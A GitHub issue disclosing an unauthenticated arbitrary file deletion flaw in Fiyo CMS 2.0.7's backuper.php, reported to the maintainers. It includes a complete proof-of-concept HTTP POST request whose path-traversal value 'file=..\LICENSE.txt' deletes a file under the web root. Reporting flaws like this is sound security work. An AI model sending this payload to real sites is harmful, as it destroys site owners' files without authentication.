Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Backuper.php $_POST['type'] $_POST[file] variable have the vulnerability to delete any files #6

Open
Rai4over opened this issue Jul 20, 2017 · 0 comments

Comments

Projects
None yet
1 participant
@Rai4over
Copy link

commented Jul 20, 2017

Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work
Fiyo CMS version 2.0.7 has a vulnerability to remove any file.
There is no need to login in when exploiting this vulnerability

The code does not correct the $POST['type'] and $ POST[file],
these two parameters can be attacked by the attacker, the incoming malicious parameters caused by any file delete vulnerability

File location: dapur\apps\app_config\controller\backuper.php
https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/apps/app_config/controller/backuper.php

image

Vulnerability Verification (this will remove LICENSE.txt under Web root)

Url: http://127.0.0.1/dapur/apps/app_config/controller/backuper.php
Referrer: http://127.0.0.1
POST: type = database & file = .. \ LICENSE.txt

Detailed request packet

POST /dapur/apps/app_config/controller/backuper.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/
Cookie: Hm_lvt_2f11040b51649a178c3fc835fd60c6f1=1499412807,1499422916,1499519057,1499663544; PHPSESSID=k6ish7tp0vq65avh7q03pr1t25
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

type=database&file=..\LICENSE.txt

Discoverer: Rai4over of Neusoft

@Rai4over Rai4over changed the title Backuper.php $ type $ file variable have the vulnerability to delete any files Backuper.php $_POST['type'] $_POST[file] variable have the vulnerability to delete any files Jul 21, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.